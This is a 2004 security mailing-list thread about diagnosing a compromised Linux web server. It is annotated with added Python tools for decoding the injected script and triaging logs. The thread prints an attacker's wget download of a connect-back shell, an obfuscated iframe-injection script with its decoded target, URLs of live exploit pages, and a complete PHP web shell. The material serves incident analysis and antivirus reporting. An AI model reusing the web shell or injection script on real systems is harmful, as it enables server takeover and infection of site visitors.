Mailing List Archive

xpire.info & splitinfinity.info - exploits in the wild
Hi list,
I'm doing some analysis on a Linux-Mandrake 9.0 web server
belonging to a person who was compromised in October.
On this host a special trojan is now installed that inserts a
malicious <IFRAME> tag into every served .PHP page.

The host is running these services :

Port 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Port 22: SSH-1.99-OpenSSH_3.4p1
Port 25: 220 XXXXX ESMTP 5.5.1
Port 110: +OK <XXXX@XXXXXX>
Port 3306: MySQL 3.23.52
Ports 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake Linux/6mdk)
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I found in the Apache log that the hacker broke into the machine
using an overflow and injected an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines:

[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11)
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO" <angdimar@yahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11)
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11)
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowski@libero.it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.
HTTP richiesta inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

0K .......... ........ 100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11)
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11)


Trying a WGET of http://xpire.info/cli.gz, I get an ELF executable for Linux,
possibly containing a connect-back shell. Inside this ELF file you can grep
these strings:

Usage: %s host port
pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
Fuck you so
/bin/sh No connect
Looking up %s... Failed!
OK
%u Connect Back

I don't know if the hacker installed a rootkit on this machine, but the check
of the md5sums of the ls, lsof, ps and netstat binaries against the ones from a
clean Mandrake distribution was good.......

The main problem is finding how the Apache server (or PHP) was altered by
the hacker, because every user that connects to this host now could be
infected by several recent HTML/IE exploits.
Sniffing an HTTP packet from this host, I found that *SOMETIMES* (in a
random way??) the web server inserts a special JavaScript between the HTTP
header and the served page. The script is:

<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>

Decoding it, I see that it writes an <IFRAME> tag inside the page, pointing
to this URL:

<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1 width=1></iframe>

If you surf to this page (don't do this if you use IE or are not patched)
you could get infected by several exploits, because it opens a lot of
<iframe>s pointing to different domains.

I would like to list these domains here, because they are sources
for exploit study:

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are:

1) How can I remove this injected JavaScript/IFRAME? I've checked
httpd.conf and a lot of PHP pages, but I didn't find anything.....
Is it possible that the hacker installed some compromised Apache module
or so???

2) Does anyone know these sites (xpire.info or splitinfinity.info)?
Why are they still online and serving trojans/exploits to surfers' browsers?
xpire.info is related to "Mike Fox"..... but it sounds like a fake John Doe
registration!

Domain ID: D5946452-LRMS
Domain Name: XPIRE.INFO
Created On: 23-May-2004 19:41:15 UTC
Last Updated On: 02-Aug-2004 08:07:20 UTC
Expiration Date: 23-May-2005 19:41:15 UTC
Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
Status: ACTIVE
Status: OK
Registrant ID: C4752858-LRMS
Registrant Name: Mike Fox
Registrant Organization: n/a
Registrant Street1: Hali-gali, 77
Registrant City: Deli
Registrant Postal Code: 12345
Registrant Country: IN
Registrant Phone: +91.226370256
Registrant Email: c8idkvtgarwinidkvt38@yahoo.com


3) How can I tell if a rootkit was installed???

Thanks to anyone who replies

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
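The `eval(String.fromCharCode(...))` wrapper quoted in the post above is a trivial obfuscation, and the decoding step is worth having as a tool rather than doing by hand. The Python below is an added example, not code from the original post: it embeds the script exactly as it appears in the mail (line wraps and all, so the number "101" split across two lines is rejoined), turns the code list back into text, and pulls every <iframe> src out of the result. The regexes are my own assumptions about the shape of this obfuscator; they are not a general JavaScript deobfuscator.

```python
import re

# Sample copied from the post, including the line wraps a mail client added
# (the "...116,1" / "01,40..." split is the single code 101).
SAMPLE_SCRIPT = """<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>"""

# One String.fromCharCode(...) call; the argument list may span several lines.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+?)\s*\)")
# <iframe ... src=...>, case-insensitive, quotes optional.
IFRAME_SRC = re.compile(r"<iframe[^>]*?\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def decode_fromcharcode(script: str) -> list:
    """Return the decoded string of every String.fromCharCode(...) call in `script`.

    All whitespace (including the newlines wrapped into the mail) is stripped
    from the argument list before splitting, so numbers broken across lines
    are rejoined instead of being read as two smaller codes.
    """
    decoded = []
    for match in FROMCHARCODE.finditer(script):
        args = re.sub(r"\s+", "", match.group(1))
        codes = [int(c) for c in args.split(",") if c]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def iframe_sources(html: str) -> list:
    """Extract the src attribute of every <iframe> in `html`."""
    return IFRAME_SRC.findall(html)


def analyse(script: str) -> dict:
    """Decode the script and list the iframe targets hidden inside it."""
    payloads = decode_fromcharcode(script)
    targets = [src for p in payloads for src in iframe_sources(p)]
    return {"payloads": payloads, "iframe_targets": targets}


if __name__ == "__main__":
    result = analyse(SAMPLE_SCRIPT)
    for payload in result["payloads"]:
        print("decoded:", payload)
    for target in result["iframe_targets"]:
        print("iframe ->", target)
```

Running it prints the `document.write("<iframe src='http://www.splitinfinity.info/fa/?d=get' ...>")` payload and the single URL, which is the same result the post reached by hand; `iframe_sources` also copes with the upper-case `<IFRAME SRC="...">` form that appears later in the thread.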
Re: xpire.info & splitinfinity.info - exploits in the wild
Ahhhh....... check out this too @
http://lists.netsys.com/pipermail/full-disclosure/2004-October/027350.html

Re: xpire.info & splitinfinity.info - exploits in the wild
On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio <eflorio@edmaster.it> wrote:
> Hi list,
> I'm doing some analysis on a Linux-Mandrake 9.0 web server
> belonging to a person who was compromised in October.
> On this host a special trojan is now installed that inserts a
> malicious <IFRAME> tag into every served .PHP page.
. . .
> I found in the Apache log that the hacker broke into the machine
> using an overflow and injected an executable /tmp/a.out via "qmail-inject".

I'm not sure that qmail-inject isn't a red herring? The actual
download looks like 'wget' was used.

> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO" <angdimar@yahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowski@libero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.
> HTTP richiesta inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11)
>
> Trying a WGET of http://xpire.info/cli.gz, I get an ELF executable for Linux,
> possibly containing a connect-back shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installed a rootkit on this machine, but the check
> of the md5sums of the ls, lsof, ps and netstat binaries against the ones from a
> clean Mandrake distribution was good.......

I assume you used a bootable CD on the infected machine to do the checksums?


> The main problem is finding how the Apache server (or PHP) was altered by
> the hacker, because every user that connects to this host now could be
> infected by several recent HTML/IE exploits.

Check the httpd.conf (and other Apache configuration files) for any
changes, and also the contents of each module loaded. It's also
possible, but less likely, that the injection is done in a kernel
module.


> Sniffing an HTTP packet from this host, I found that *SOMETIMES* (in a
> random way??) the web server inserts a special JavaScript between the HTTP
> header and the served page.

Sounds like a good time to replace the entire server with a fresh build.


Kevin

Re: xpire.info & splitinfinity.info - exploits in the wild
> I'm not sure that qmail-inject isn't a red herring? The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

WGET was used to retrieve the http://xpire.info/cli.gz connect-back shell.
After further analysis I found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here is the log captured by Apache:

--------------------------------------------------------------------------------
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28-- http://xpire.info/cli.gz
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........ 100% 20.04 KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, you can see that in the log I showed first the
stdout was in Italian (because the compromised server is .it), while in this
case it is in English.
The hacker launched the WGET command to retrieve his hacking tool into /tmp/a.out.
In this log you can also see that the hacker tried to execute some "ls"
commands, as a first trial to test the vulnerability, I suppose.
Moved by this, after further analysis I found that the vulnerability used is an
obvious-but-effective PHP injection using global variables
(http://www.securityfocus.com/archive/1/218000 is a good page to learn
something about this vuln).

The hacker pages used to accomplish the injection are based on this
test page, taken directly from the hacker site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojans/backdoors/shells/worms/exploits and
other malware.... why is it still open?

http://xpire.info/cli.gz // connect-back shell
http://xpire.info/fa/aga.exe // Agobot family
http://xpire.info/install.gz // some trojan/malware???? my Norton AV does not catch it; it's a Windows EXE

This is the sample PHP injection page:
<?
// Relies on register_globals being enabled: every request parameter becomes
// a PHP variable, so $lox below is whatever the attacker POSTs in the form.
$OS = system('uname -a');                // fingerprint the host
$X = system('ls -la /usr/bin/X11/X');    // source of the stray "ls:" errors in the log
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<!-- runs the POSTed command with the web server's privileges and echoes its output -->
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using the PHP "system" call, it is possible to execute any remote command, like
WGET for example.
Does anyone know this page???


> I assume you used a bootable CD on the infected machine to do the checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely, using SSH, so I cannot use a bootable CD on this remote
host very far from me :)
I'm limited in the analysis..... but the host is not mine!
However I think that md5sum gave me good results, because I compared the whole
/usr/sbin directory and all the checksums were good, except for
/usr/sbin/crond...... any ideas???
I also used the "rpm -Vf" utility to cross-check the results, and they were the
same as md5sum.

> Check the httpd.conf (and other Apache configuration files) for any
> changes, and also the contents of each module loaded. It's also
> possible, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all the *.conf files related to the
Apache/PHP modules of this machine, but nothing was found. An injected LKM
could be the only answer.

I also ran "chkrootkit" as someone suggested to me, but all the tests gave a
positive answer (no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity begins :))))))

Thank you for the help, Kevin.

EF

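Both wget transcripts in this thread (the Italian one from the first post and the English one above), the "sh: ... requires an argument" lines and the stray "ls:" errors are the kind of thing a quick automated pass over error_log should pull out before anyone reads it by hand. The Python below is an added example, not from the original posts or any tool mentioned in them. It walks a constructed error_log sample assembled from the lines quoted in the thread, collects Apache child segfaults, pairs each wget start line with its "saved"/"salvato" line, and flags downloads into world-writable directories. The indicator regexes and the list of "first commands an attacker runs" are my own assumptions, tuned only to the messages shown here.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: error_log lines modelled on the ones quoted in this thread
# (Italian wget transcript from the first post, English one from the reply).
SAMPLE_LOG = """\
[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowski@libero.it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... fatto.
Lunghezza: 19,147 [text/plain]
15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
--18:06:28-- http://xpire.info/cli.gz
Resolving xpire.info... done.
HTTP request sent, awaiting response... 200 OK
18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
"""

SEGFAULT = re.compile(r"child pid (\d+) exit signal Segmentation fault")
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
# wget's final line; "salvato" is the Italian locale's "saved" (assumption from the post).
WGET_SAVED = re.compile(r"`([^']+)'\s+(?:saved|salvato)\s+\[(\d+)/(\d+)\]")
SHELL_ERROR = re.compile(r"^sh: .*requires an argument")
# stderr of commands typically run first through a web shell (assumed list)
COMMAND_ERROR = re.compile(r"^(?:ls|uname|id|cat|wget|curl): ")
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Download:
    url: str
    dest: Optional[str] = None
    size: Optional[int] = None

    @property
    def suspicious(self) -> bool:
        """A tool fetched into a world-writable directory is the classic drop."""
        return self.dest is not None and self.dest.startswith(DROP_DIRS)


@dataclass
class Triage:
    segfault_pids: List[int] = field(default_factory=list)
    shell_errors: List[str] = field(default_factory=list)
    command_errors: List[str] = field(default_factory=list)
    downloads: List[Download] = field(default_factory=list)


def triage_error_log(text: str) -> Triage:
    """Single pass over error_log text collecting the indicators seen in the thread."""
    t = Triage()
    pending: Optional[Download] = None  # wget start line waiting for its "saved" line
    for raw in text.splitlines():
        line = raw.strip()
        m = SEGFAULT.search(line)
        if m:
            t.segfault_pids.append(int(m.group(1)))
            continue
        m = WGET_START.match(line)
        if m:
            pending = Download(url=m.group(1))
            t.downloads.append(pending)
            continue
        m = WGET_SAVED.search(line)
        if m and pending is not None:
            pending.dest, pending.size = m.group(1), int(m.group(3))
            pending = None
            continue
        if SHELL_ERROR.match(line):
            t.shell_errors.append(line)
        elif COMMAND_ERROR.match(line):
            t.command_errors.append(line)
    return t


def summary(t: Triage) -> List[str]:
    """Human-readable findings, one per line."""
    lines = [
        f"{len(t.segfault_pids)} Apache child segfaults (pids {t.segfault_pids})",
        f"{len(t.shell_errors)} shell usage errors, {len(t.command_errors)} stray command errors",
    ]
    for d in t.downloads:
        flag = "SUSPICIOUS" if d.suspicious else "ok"
        lines.append(f"[{flag}] {d.url} -> {d.dest} ({d.size} bytes)")
    return lines


if __name__ == "__main__":
    print("\n".join(summary(triage_error_log(SAMPLE_LOG))))
```

Command stdout and stderr only land in error_log because the process that ran them inherited Apache's file descriptors, which is itself a useful tell: anything in that file that is not an Apache-formatted line came from a child of the web server.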
Re: xpire.info & splitinfinity.info - exploits in the wild
Elia Florio wrote:

> > I'm not sure that qmail-inject isn't a red herring? The actual
> > download looks like 'wget' was used.
> Good suggestion, my friend :)
>
> WGET was used to retrieve the http://xpire.info/cli.gz connect-back shell.

More specifically, from the strings in the binary it looks awfully like
sd's bindtty -- try Googling for "bindtty.c"...

The possible bad news is that bindtty is used in the suckit rootkit, so
your remote-only access may cause major (if not insurmountable)
problems to doing a half-useful diagnosis...

<<big snip>>
> The hacker pages used to accomplish the injection are based on this
> test page, taken directly from the hacker site :-)
>
> http://xpire.info/s/2
> http://xpire.info/s/
>
> I notice that this site is full of trojans/backdoors/shells/worms/exploits and
> other malware.... why is it still open?

You'd be surprised how few folk actually complain about a lot of these
sites. Compound that with the rate of incompetence at many small (and
even many not-so-small) ISPs, where the very thin margins mean they
don't have time (and seldom good enough staff anyway) to analyse such
complaints, and where the emphasis is often more on making sure they
get their $10, $20, $40, etc this month from that customer, and many
such sites stay up way too long. The way to break such sites is for
some "authority" to contact them (a CERT, law enforcement, etc) or
"enough" polite, professional, clearly technically competent but not
overly technical complaints explaining what the site is being used for
and why it should be shut down. Of course, often the "base" sites are
themselves simply just ill-maintained systems that have, themselves,
been hacked and if all the ISP is up to doing is closing the apparently
rogue site/account, or simply removing the "offending content" the site
(and others similarly hosted on the still badly maintained servers)
remains open to further, similar abuse.


Regards,

Nick FitzGerald

Re: xpire.info & splitinfinity.info - exploits in the wild
As pertains to compromised systems, the best advice, unless you are doing
forensics to get a handle on how the system was compromised or seeking
legal damages, is to just plain reinstall and make sure the system is
patched and properly firewalled prior to reconnecting it to the internet.
Anything less than a reinstall is likely to permit the attacker to regain
entry to the system. Two points to mention: mysql should not be available
to the public, it should be firewalled off from public consumption, if it
can't be outright killed and uninstalled. php is a problematic
scripting language, and requires someone with intense focus on security
to lock down. Never use the vast majority of php packages publicly
available; we see 5-10 of them weekly suffering from security issues, some
popping up on a weekly or bi-weekly schedule.

3rd point, in these times with scp and sftp available, ftpd should be
turned off, uninstalled and access only granted via scp/sftp for file
transfers to a server.

Thanks,

Ron DuFresne


--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

Re: xpire.info & splitinfinity.info - exploits in the wild
Finally, I cleaned the compromised box of my friend :))
I found (following many helpful suggestions from people on the FD list)
that a variant of the "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
in any way and they said that everything is OK.

To find suckit and deactivate it I used this:
http://tsd.student.utwente.nl/skdetect/
It's code based on the suckit source code, but without the malware part.
It can dig into /dev/kmem and explore sys_call_table[];
skdetect was able to find suckit installed.
Another person who was compromised by the "xpire.info" hacker told me that
the symptoms were the same and that he also found this suckit variant
installed on his host.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After a reboot everything came back to normal activity.
Thanks to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on the "xpire.info/fa/?d=get" malware page you can find these exploits
in the wild:

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME#
#iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
#iframe src="http://213.159.117.133/dl/adv121.php" width=1 height=1></iframe#
!-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME# //-->

There are a lot of backdoors/trojans ready to install and the bad news is that
most of this malware is recompiled, so many AVs are fooled and don't catch it
(for example Symantec and ClamAV don't recognize much of the malware
on this site, after a quick test made with www.virustotal.com)

Bye,
EF

Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild
On Wed, 27 Oct 2004, Elia Florio wrote:

> There are a lot of backdoors/trojans ready to install and the bad news is that
> most of this malware is recompiled, so many AVs are fooled and don't catch it
> (for example Symantec and ClamAV don't recognize much of the malware
> on this site, after a quick test made with www.virustotal.com)

If you have some time, could you assist the clamav team and send them a
detailed report with your findings and the undetected code bits?

They will appreciate your cooperation in this.

Hugo.

--
I hate duplicates. Just reply to the relevant mailinglist.
hvdkooij@vanderkooij.org http://hvdkooij.xs4all.nl/
Don't meddle in the affairs of magicians,
for they are subtle and quick to anger.

Re: xpire.info & splitinfinity.info - exploits in the wild
>> (for example Symantec and ClamAV don't recognize much of the malware
>> on this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support the Clam team.... they're working
hard on a valuable open-source AV and I appreciate this too!
I can send them my reports (extracted from virustotal.com) and
the undetected files (exe, dll, class, javascript, html) with
malware/trojans and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF

________________________________________________
Message sent from
Edizioni Master Webmail
http://mbox.edmaster.it

Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild
On Wed, 27 Oct 2004, Elia Florio wrote:

> Of course, I'd like to support the Clam team.... they're working
> hard on a valuable open-source AV and I appreciate this too!
> I can send them my reports (extracted from virustotal.com) and
> the undetected files (exe, dll, class, javascript, html) with
> malware/trojans and exploits taken from "xpire.info".
>
> Where do I send this archive? What's the mail address?
> Must I use a PGP key or simply a password-protected zip?

The following page should inform you about everything you need to know:
http://clamav.catt.com/cgi-bin/sendvirus.cgi

Hugo.

--
I hate duplicates. Just reply to the relevant mailinglist.
hvdkooij@vanderkooij.org http://hvdkooij.xs4all.nl/
Don't meddle in the affairs of magicians,
for they are subtle and quick to anger.
